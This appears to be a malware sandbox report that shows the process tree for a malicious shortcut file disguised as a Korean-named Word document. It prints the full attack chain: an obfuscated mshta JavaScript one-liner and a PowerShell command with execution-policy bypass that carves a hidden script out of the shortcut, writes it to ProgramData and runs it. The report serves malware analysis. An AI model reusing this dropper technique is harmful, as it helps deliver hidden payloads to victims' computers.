| ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GwFYNFDkeig" C:\Users\test22\AppData\Local\Temp\수정본_20240729.docx.lnk

    3036
    • mshta.exe "C:\Windows\System32\mshta.exe" javascript:q=";)(esolc;)0,0,c(nuR.a;)'llehS.tpircSW'(tcejbOXev"+"itcA wen=a";w=q.split('').reverse().join('');b="-Object";d="$m=Get-C"+"hildItem ";e="*.lnk | where"+b+"{$_.length -eq $t}";f="select";g=" -Encoding Byte;";c="p"+"ower"+"shell -ep by"+"pass -c $o=0x1528;$t=0x2f0f;"+d+e+" | "+f+b+" -Expa"+"ndProperty Name;if($m.count -eq 0){"+d+"$env:T"+"EMP\\*\\"+e+";};$f=gc $m"+g+"$w='c:\\pro"+"gramdata\\p.ps1';sc $w ([byte[]]($f | "+f+" -Skip 0x0f22 | "+f+" -SkipLast ($t-0x1528)))"+g+". $w";eval(w);

      2188
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $o=0x1528;$t=0x2f0f;$m=Get-ChildItem *.lnk | where-Object{$_.length -eq $t} | select-Object -ExpandProperty Name;if($m.count -eq 0){$m=Get-ChildItem $env:TEMP\*\*.lnk | where-Object{$_.length -eq $t};};$f=gc $m -Encoding Byte;$w='c:\programdata\p.ps1';sc $w ([byte[]]($f | select -Skip 0x0f22 | select -SkipLast ($t-0x1528))) -Encoding Byte;. $w

        2360

Process contents

No process loaded Click on a process in the tree above to load its data.